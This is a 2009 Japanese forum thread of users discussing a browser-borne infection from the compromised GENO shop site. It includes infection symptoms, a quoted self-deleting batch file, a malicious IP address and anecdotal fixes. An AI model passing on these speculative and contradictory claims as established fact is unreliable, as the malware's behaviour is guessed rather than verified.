これ踏んだ後Windows Updateできなくなったやついる? 割れでもない普通のXPなんだがうpだて出来なくなってる… サービスが起動してないっていうから見てみたけど起動してるし…
Vistaで感染したってやついる?
822 :
コデマリ(千葉県) :2009/04/05(日) 21:47:29.65 ID:9Adf0bya
>>818 これまでのレスを超簡単に取りまとめると、、、
1.最新ではないAcroBatReaderのバージョン8がインスコされているとPC内にPDFがわんさか増殖してHDDを食いつぶす。
2.その際にCPU負荷がとんでもない状況になってブラウザが落ちたり操作不能でリセットボタンを「ぽちっとな」する羽目に。
3.OS再起動するとブルースクリーンになり再インスコする羽目に。
URL踏んだがどうってことない。
いつになったらこのウイルスの情報でるかな? とりあえずa-squaredでスキャンしたら大丈夫だろうか・・・ これが解決するまでamazon使えねえ
AcroBatReader入れてなかったわ 入れてから開いてくる
俺なんかIE6で止めてたのに GENO見たらフリーズして再起動したらIE7にされてたぜ。 WU以外は使わないからどっちでもいいっていやいいんだけど。
Spybotだと検出できるかな? 普段からJavaScriptは切っておくのが安全なんだな
828 :
スズメノヤリ(愛知県) :2009/04/05(日) 21:50:49.99 ID:YhBqCRka
念の為、対応してるソフトでスキャンかけた方が良いぞ。
829 :
イモガタバミ(北海道) :2009/04/05(日) 21:51:24.78 ID:F4ogAJ6W
>>812 それなんだが、どうやら最初にラトビア鯖へアクセスしたUAとIPアドレスを紐付けて管理しているみたい。
なので同一IPでアクセスしている場合、その後どうUAを偽装しようが同じコードが返ってくる。
俺のIDがコロコロ変わっているのもその関係。
UA変えた後同じIPでアクセスしてないか?
>>827 やってみたけど、クッキーしか出なかったよ
831 :
節分草(catv?) :2009/04/05(日) 21:51:37.44 ID:XV6tShH1
avast導入 といってもなにをしたらいいかわからないわ
vistaだけど何を持って感染というのか分からんから 即イメージから復元したよ 短い間だが俺が気付いた事っつったら HDDとCPUが継続して使用状態になってた HPアクセス時にノートンに許可や遮断ログが色々書き込まれてた ラトビアIPとの通信ログがあった こんなもんだな、変なプログラムは見当たらなかったよ
833 :
スズメノヤリ(愛知県) :2009/04/05(日) 21:52:35.30 ID:YhBqCRka
原子力マークが出るまで待つだけ。
834 :
オオイヌノフグリ(アラバマ州) :2009/04/05(日) 21:52:42.25 ID:0x6e4xpu
こないだここで買ったノーパソのアダプターにPSE入ってなかったんだけど、 要らなくなってヤフオクで売ったら俺捕まる?
835 :
キブシ(長屋) :2009/04/05(日) 21:52:49.16 ID:UuFj6r6c
まあ一ついえることは二度とgenoにアクセスすることは無いw
お前ら結構geno知ってるんだな
しかし、誰がしたのかも不明なのがな・・・・。
838 :
スズメノヤリ(愛知県) :2009/04/05(日) 21:55:16.95 ID:YhBqCRka
新聞やらアスキー流れの初心者は気付いてすらいない気ガス。
839 :
ヒメマツムシソウ(神奈川県) :2009/04/05(日) 21:55:18.81 ID:ir1Myk9p
まだ直ってないとかクズにも程がある
>>830 dクス
やっぱり対応したソフトを入れないとダメか
842 :
ケブカツルカコソウ(長屋) :2009/04/05(日) 21:56:39.26 ID:mKOwqBaN
ゲノの鯖缶はやる気あるの?基地外なの?
843 :
サイネリア(dion軍) :2009/04/05(日) 21:57:40.18 ID:3fnFEon2
サクセスみたいに夜逃げするんじゃ・・・
844 :
サイネリア(アラバマ州) :2009/04/05(日) 21:58:10.79 ID:l1Vd3agq
月曜日おおわらわだろうなw
もっと伸びてないとおかしいスレなのになんで★2なの?もっと問題に なるべきだろこれ。それとも明日から急に加速すんのかな?
a-squaredで調べてみたら \windows\umplyxoolに感染してた
847 :
オキナグサ(アラバマ州) :2009/04/05(日) 22:01:22.45 ID:kvkquIi3 BE:174252-PLT(14437)
848 :
コデマリ(千葉県) :2009/04/05(日) 22:01:45.27 ID:9Adf0bya
>>845 Faithとか1’sだと軽く★20位逝ってたと思うw
>>817 もう警戒しない気になれないぜ・・・もう怪しいURL踏まない
糞古いノート使ってるんだが、ネットにつなぐと問題が起こったとかでるんだけど、何なのこれ 終了ですか?
851 :
スズメノヤリ(愛知県) :2009/04/05(日) 22:05:25.59 ID:YhBqCRka
PC一台しかない香具師は現在リカバリ中だろうから、明日辺りからが修羅場だな。
852 :
コデマリ(千葉県) :2009/04/05(日) 22:06:07.67 ID:9Adf0bya
>>851 あ、そーいう奴も隠れて多いのかも知れないね。
>>23 これらだったらどれを使っても今回のウイルスもチェック可能?
会社でやっちまったら困るよな 自宅マシンでまだよかったか?
やっぱブラウザは家にしろ火狐にしろオペラにしろUSBからポータブル系使うに限るな。
>>853 それがGenoの狙いでは…?
このウイルス騒ぎで知名度上げて
ところで↓と同じ状態の奴いる? 536 名前: SM-3(茨城県)[sage] 投稿日:2009/04/05(日) 01:15:16.14 ID:0Dln3hZK ルートにu.batってのが作られてたorz 中身は以下のとおり :Z DeL "K:\_.t" IF EXIST "K:\_.t" GOTO Z DeL "K:\u.bat" こことは関係ないかもしれんが何かにやられたのか確実だorz
860 :
スズメノヤリ(愛知県) :2009/04/05(日) 22:08:56.37 ID:YhBqCRka
プニルで見事に爆死した漏れも火狐に乗り換えるかね。 イマイチなれんのよね。
862 :
サイネリア(dion軍) :2009/04/05(日) 22:09:19.80 ID:3fnFEon2
863 :
タチイヌノフグリ(福岡県) :2009/04/05(日) 22:09:23.67 ID:fPoRIsOp
864 :
アマリリス(アラバマ州) :2009/04/05(日) 22:10:03.40 ID:p1i6EYrA
狐でもjs有効だと駄目だぜ
865 :
コデマリ(千葉県) :2009/04/05(日) 22:10:15.57 ID:9Adf0bya
>>855 会社のPCで踏んで食らったら普通に始末書レベルだよね。
例えショッピングサイトとはいえ、私用でWebで遊んでたのがバレバレだもの。
会社の備品購入ならもっとまともな店から買うはずだし。
こんな店で買うなんて書いたら稟議書通らないだろw
867 :
スズメノヤリ(愛知県) :2009/04/05(日) 22:12:08.57 ID:YhBqCRka
漏れのCore2ノート届くのかねぇ・・・orz
868 :
コデマリ(千葉県) :2009/04/05(日) 22:12:16.61 ID:9Adf0bya
>>861 ファイル名とフォルダ名はランダムだと思うから
名称を聞いても意味無いんじゃないのかな。
その中にEXEファイルとPDFファイルが居るかどうかが問題なのかと。
大半はブラウザ強制終了されておかしいな、と思うくらいな気がする 何か仕込まれていると気づいても、実害があるのかどうかわからんという 俺みたいなのも結構いるんじゃないかなぁ 変な実行ファイルは見あたらないし、バックドア仕込まれている様子もないから とりあえず様子見するしかない でも長期間サイト放置しているGENOは許せないな もうここじゃ買い物できない
871 :
桜(静岡県) :2009/04/05(日) 22:12:54.78 ID:feTrCbuR
GENOを引きずり落とそうとするライバル業者の書き込みが目立つスレですね
872 :
藤(神奈川県) :2009/04/05(日) 22:13:47.24 ID:7VElRfeM
873 :
コデマリ(千葉県) :2009/04/05(日) 22:14:42.10 ID:9Adf0bya
>>869 なんかクラッキングされたスクリプトにはFlashの脆弱性を付いたのも書かれているみたいだけど、
結局Flash関連の現象が報告されないって事は
その前のPDFの処理だけでCPU負荷が上がりまくって落ちちゃうからなのかも知れないね。
>>871 Genoが勝手に落ちてっているだけ。もともと評判よくは無いのに…
カスペルスキー「Meですか・・・ごめんなさい」 。・゚・(ノ∀`)・゚・。
876 :
桜(静岡県) :2009/04/05(日) 22:16:25.46 ID:feTrCbuR
>>869 とか露骨
もう買わないとか、その手の書き込みはすべて業者
877 :
アルストロメリア(千葉県) :2009/04/05(日) 22:16:37.04 ID:ilYpXZIZ BE:92208184-2BP(433)
>>874 ジェノなのにGEOが有名なせいでゲノゲノ言われてなぁー
879 :
カントウタンポポ(大阪府) :2009/04/05(日) 22:17:28.85 ID:ELJz1ZXf
Geno社員が、個人情報満載の事務用PCで 「今日のうちのHPのネタはっと・・・」カチカチッ おめでとうございます。おまいらの情報はめでたくツコウタされました。
880 :
オキナグサ(アラバマ州) :2009/04/05(日) 22:17:48.84 ID:kvkquIi3 BE:244627-PLT(14437)
だからよ、お前ら本当にウイルス仕込まれたの?
881 :
菜の花(福岡県) :2009/04/05(日) 22:17:58.47 ID:CMFaaahW
882 :
メギ(東京都) :2009/04/05(日) 22:18:05.86 ID:4k4u1rhq
883 :
ミゾコウジュミチノクコザクラ(catv?) :2009/04/05(日) 22:18:50.49 ID:O0NRBbv3
>>868 いや だから聞きたいのは引っかかったウイルスの名前さ
>>829 なるほど、そういうことか。
ウィルスにやられた人の情報とかも収集してそうだな。
886 :
クレマチス・モンタナ(関東・甲信越) :2009/04/05(日) 22:19:45.73 ID:oy9irtQO
887 :
コデマリ(千葉県) :2009/04/05(日) 22:20:31.64 ID:9Adf0bya
687 名前: ◆N9P3SuvBPo [sage] 投稿日:2009/04/05(日) 22:08:16 俺今な、そのgenoのトップやiframeで読み込まれるアンケートページ 問題の数字から始まるアドレスとかを、表示したけどみんなが言ってるようなことは起きませんぞ? OSはWindowsXPSP2で、WindowsUpdateも購入時の状態からやってないし、 ウイルス対策ソフトも入れてないし、おまけにブラウザはIE6SP2だし、 この環境だと、誰がどう見ても間違い無く、そのページを開いて時点でフリーズして終了ってことですよね? 誰でも良い、仮想PC持ってる人いたら検証してくれ!!
このウイルスでPCが壊れたりはしない? 今までと同じように使えるなら別に気にしないけど。
891 :
藤(神奈川県) :2009/04/05(日) 22:21:38.06 ID:7VElRfeM
892 :
コデマリ(千葉県) :2009/04/05(日) 22:21:39.66 ID:9Adf0bya
893 :
コデマリ(千葉県) :2009/04/05(日) 22:22:20.51 ID:9Adf0bya
>>877 ウイル・スミス
なんちゃってーカクカクカクカクカク
コマンドプロンプト開こうとしても開けない・・・・ explorerが落ちる
897 :
ミゾコウジュミチノクコザクラ(catv?) :2009/04/05(日) 22:23:35.70 ID:O0NRBbv3
やっぱインターネッツは恐ろしいぜHAHAHA!!
898 :
オステオスペルマム(静岡県) :2009/04/05(日) 22:24:15.77 ID:mvkK0dTv
HAHAHA
>>873 確かにあっという間にメモリ食いまくって落ちたから実害なかったのかもしれんね
>>876 買うとか買わないとか書き込みすると、すぐに業者とかいわれるんだなw
ここじゃあまり買ったことはないけど、販売リスト眺めるのは好きだったよ
>>889 「利用する 便利じゃん」ですね。わかりま(´・ω・)ス
昨日開いたけど何も起こらなかったな。Readerも起動しなかったし、なんなだろ。
905 :
カキツバタ(アラバマ州) :2009/04/05(日) 22:32:08.84 ID:qIasrM2X
a-squaredで調べたら問題なかったんだが 今度はa-squaredのプロセスが常駐してウザい
>>880 昨日の夜感染した
IEが負荷かかって落ちる
AVGの更新ができない
アップデートもIEが固まってできない
最初メモリがいかれたかと思ったんだけど
復旧で直った
あとはあす調べてみる
>>895 同じ事なって、1日前に修復したらなおったけど、
この件がきっかけだったら・・・・。
>>895 システムの復旧で直る
ウイルスが消えたかどうかかわからないけどね
911 :
イモガタバミ(北海道) :2009/04/05(日) 22:41:55.41 ID:F4ogAJ6W
多分flashの方は9.0.115.0以前に存在する脆弱性をつくもの 9.0.124以上であれば問題ないと思われる
915 :
アルストロメリア(千葉県) :2009/04/05(日) 22:49:12.64 ID:ilYpXZIZ BE:43223235-2BP(433)
月曜まで放置だから2chとか見てない奴の被害がどんどん拡大するw
鬼畜企業だな〜w
昨日、GENO見ててFirefoxが落ちるなぁと思ったが、感染してたのかな。 今日の昼も見てたんだが・・・。 ウイルスバスターで検索かけてるが、今のところ何にも出てこない。 感染した場合の判別方法がはっきりしてないから、どうしようもなくてただ見てるだけ。
917 :
サイネリア(dion軍) :2009/04/05(日) 22:51:40.98 ID:3fnFEon2
踏んでからクリーンインストールで余裕でした
919 :
藤(神奈川県) :2009/04/05(日) 22:52:59.64 ID:7VElRfeM
>>887 oh...miss spell
[Fuck you]
921 :
スズメノヤリ(愛知県) :2009/04/05(日) 22:54:21.20 ID:YhBqCRka
そもそも有料ソフトで拾えないとかクソ過ぎる。
922 :
コデマリ(千葉県) :2009/04/05(日) 22:55:17.33 ID:9Adf0bya
firefoxなら落ちなかった。
新作ウイルスってところがちょっと盛り上がってる原因だな あとはgenoの無責任放置っぷりか
926 :
プリムラ・インボルクラータ(北海道) :2009/04/05(日) 22:55:29.38 ID:tk/Bpcwv
キングソフトが対応したみたいだな
927 :
イベリス・ウンベラタ(徳島県) :2009/04/05(日) 22:56:37.38 ID:qBMLTRpS
>>910 システムの復元で4/2にしたよ。ありがとー。
928 :
プリムラ・インボルクラータ(北海道) :2009/04/05(日) 22:56:59.37 ID:tk/Bpcwv
なんだ、FlashとReaderを最新にしてれば感染しないじゃん。つまらん。
930 :
オオタチツボスミレ(関西・北陸) :2009/04/05(日) 22:58:28.97 ID:iqwnWZXf
ノートン2007で勝てる相手なのか?それが知りたい。
XP SP3でIE6で見てフリーズ。 カスペでチェックしたけど何もでない。 しかし、踏んでしまっただけに気になる。 これって結局、目的はボットの作成だろ。 acrobatかflashの脆弱性をついてバックドアを 開けといて後から使うつもりなんじゃないの?
933 :
コデマリ(千葉県) :2009/04/05(日) 23:01:03.44 ID:9Adf0bya
>>931 前スレではスパムメール鯖がポートを突っついてきたなんてレスもあったんで、
恐らく放置しておくと踏み台とかそんな感じで使われちゃうんだと思う。
934 :
オオタチツボスミレ(関西・北陸) :2009/04/05(日) 23:01:23.49 ID:iqwnWZXf
>>919 >>198 にTrendMicroの文字があるけど、これじゃ駄目ってこと?
あと昨日の午前3時くらいにアクセスしたPCもあって、Avastが入ってたんだけど念のため検索中。
>>919 も
>>917 も、はっきりと言ってくれてありがたい。
カスペルスキー入れてくる。。
仮想環境で踏んでくる ノシ
938 :
藤(神奈川県) :2009/04/05(日) 23:06:44.16 ID:7VElRfeM
939 :
オオジシバリ(東京都) :2009/04/05(日) 23:07:15.93 ID:vaK3oDFz
>>627 もしかしてそのHPがgeno?
かあああああああああああああああああ
今日ZIPスレで斧かアルカンのアドレスだったのに、そこのHPにぶっとばされたきがする
それから調子悪くて復元した・・・
Readerインストールしたままで放置してたから 同意すんの?あ?って画面が出ただけだった 残念!
>Norton セーフウェブでこのサイトの問題は見つかりませんでした。 本当か?先生
むしろカスペル社員の陰謀だろ カスペル信者がこのスレには多すぎる
943 :
ボタン(宮城県) :2009/04/05(日) 23:10:58.36 ID:9Sinp90Q
いまだに対応してないソフトはもうゴミと言っていいなw
カスペならもう駆除できる?
ジェノってジェノサイドって意味だなきっと
948 :
ツゲ(愛知県) :2009/04/05(日) 23:16:12.23 ID:Z/HJUnwU
解雇SEの仕業か
今まで10年くらいなんとなくバスター買ってきたけど もうカワネ。
ビスタ厨が勝利とか・・・信じられん
カスペルとバスターのオンラインスキャンと自前のノートン360で問題なかったんだけど セーフってことでいいの? VistaのWindowsUpdateは最新でAdobeReaderも9.1.0だったんだけど・・・
geno系は全部だめなはず.
いつになったらノートン・バスターは対応するんだよ カスペに遅れるのはわかるがKINGに先越されるようではなー Sソフト最新verでと過信した人がひっかかる。新型恐るべし。
955 :
ハナビシソウ(宮崎県) :2009/04/05(日) 23:19:31.71 ID:dLvh0j0o
フラッシュ最新で感染無し
>>952 もう一度、genoに繋いで確認すればいい
最新のウイルスですよ 本当に感染は無いのかな(・∀・)ニヤニヤ
なんだよ、復元で治っちゃうじゃんか。つまんねえの
960 :
スズメノヤリ(愛知県) :2009/04/05(日) 23:25:11.60 ID:YhBqCRka
やはりクリーンインスコが精神衛生上一番良い。 めんどくさくて放置してたSSDに換える良いきっかけになったよ。
961 :
ツゲ(愛知県) :2009/04/05(日) 23:26:03.13 ID:Z/HJUnwU
cmdが立ち上がらん苦なるな
962 :
藤(神奈川県) :2009/04/05(日) 23:26:19.98 ID:7VElRfeM
963 :
藤(神奈川県) :2009/04/05(日) 23:27:17.90 ID:7VElRfeM
とりあえず、面白がっていろんなとこに広げてる奴とか・・・・。
気になってウイルススキャンしてみたら、 違うやつが出てきたでござる。
>>951 のちに「V作戦」として、語り継がれることになる
967 :
タツタソウ(埼玉県) :2009/04/05(日) 23:32:40.58 ID:KVAjhyIK
>>951 UACの本領発揮だろ?
VistaはUIが致命的に取っつきにくいだけで、
根幹部分の設計は間違ってない
968 :
サイネリア(東京都) :2009/04/05(日) 23:34:37.29 ID:KPcOMmKo
vistaつえええ
明日朝GENOの動向に注目だな
そろそろ次スレを
鬱陶しさ全開のUACを評価することになるとはな まさかVISTAの価値を認めさせるためのMSの陰謀なのか!?
972 :
マムシグサ(茨城県) :2009/04/05(日) 23:39:06.75 ID:ZsqI05SR
じゃGENOはお詫びとしてウイルス食らった人全員にVista進呈すれば良いと思うよ
>>1 おいおいおい、なんでこのURLが紫色になってんだよ?
974 :
雪割草(群馬県) :2009/04/05(日) 23:43:00.42 ID:yXbbOzeO
なんだ真面目にウイルスなのか はよ対応せーや滓ペロペロスキー ド田舎徳島とロシアのタッグじゃ無理か
975 :
オオイヌノフグリ(アラバマ州) :2009/04/05(日) 23:44:09.66 ID:bgG3HYOY
サイト作ったITソリューションの動向も見たいな 点プレに入れておいてくれ
>>942 多くはカスペル社に報告された物が
他社製品の定義ファイルに反映される
更新頻度といい間違ってはいない
977 :
ヘラオオバコ(東京都) :2009/04/05(日) 23:45:28.09 ID:RKP2OQzJ BE:1818054667-PLT(17000)
今まで最強無防備マンだったけど、久しぶりにavast入れたぜ
全スキャンなんて数年ぶりだ
janeで誤検出あっただけで検出ナシだぜ
やっぱり最強
土日の2日間放置ってのはGENO悪質だな
失う情報なんてないわー
980 :
プリムラ・オーリキュラ(徳島県) :2009/04/05(日) 23:54:05.07 ID:+tR3l+Ok
981 :
ヒサカキ(愛媛県) :2009/04/05(日) 23:54:16.53 ID:JSbm8B6Q
>>951 マイクロソフトの工作にだまされるなよ
情強である俺たちニュー速民はは一生XPで行く
それがチームだ
982 :
メギ(アラバマ州) :2009/04/05(日) 23:54:45.17 ID:IS7Wlo3y
うめ
梅
984 :
雪割草(群馬県) :2009/04/05(日) 23:55:21.71 ID:yXbbOzeO
>>980 良く整備されたバイパスを使って行く先は結局市街地ってバイパス使う意味無いよね
985 :
藤(神奈川県) :2009/04/05(日) 23:56:16.34 ID:7VElRfeM
>>981 俺はWin7付きEeePCかAspire one出るになるまでXPで行くぜ
win7SP1が出てSSDが安くなったら乗り変える
987 :
ポピー(長屋) :2009/04/05(日) 23:58:39.04 ID:ggqLVj0N
次スレいる?
988 :
ヒサカキ(静岡県) :2009/04/05(日) 23:58:50.82 ID:Sl9ijmtO
989 :
モクレン(アラバマ州) :2009/04/06(月) 00:00:08.78 ID:IS7Wlo3y
うめ
acrobatreader5.0は勝ち組?
991 :
サクラソウ(dion軍) :2009/04/06(月) 00:00:30.50 ID:3fnFEon2
1000ならウィルス被害の生存者無し
ウィルスの名前もわからないし、Adobe製品の脆弱性を突くという以外 どういう振る舞いをするのかよくわからないし、各社アンチウィルスの 対応状況もよくわからんのだよね。 94.247.2.195に対する通信が発生する以外にどんな悪さをしてるんだろ。 今のところ対応済みなのはAvast!とカスペのみ? キングも対応済み? ノートン、バスターは× 他はどうなんだろうね?
994 :
キクザキイチゲ(群馬県) :2009/04/06(月) 00:01:15.36 ID:rT+ikxsy
1000なら御坂妹もう10万人ほどおかわり
995 :
コハコベ(千葉県) :2009/04/06(月) 00:01:26.36 ID:9Adf0bya
*'``・* 。 | 人 `* |(__) `*。 梅〜♪ ,。∩__) * + (・∀・ ) *。+゚ `*。 ヽ、 つ *゚* `・+。*・' ゚⊃ +゚ ☆ ∪~ 。*゚ `・+。*・ ゚
梅
997 :
サクラソウ(愛知県) :2009/04/06(月) 00:01:35.26 ID:KKboP1WA
まとめ↓であってるの? 1.最新ではないAcroBatReaderのバージョン8がインスコされているとPC内にPDFがわんさか増殖してHDDを食いつぶす。 2.その際にCPU負荷がとんでもない状況になってブラウザが落ちたり操作不能でリセットボタンを「ぽちっとな」する羽目に。 3.OS再起動するとブルースクリーンになり再インスコする羽目に。
998 :
サクラソウ(dion軍) :2009/04/06(月) 00:01:45.13 ID:3fnFEon2
1000ならGENO終了
1000 :
クサノオウ(長野県) :2009/04/06(月) 00:02:11.12 ID:dJYwXaAK
1000ならGENO狩猟
1001 :
1001 :
Over 1000 Thread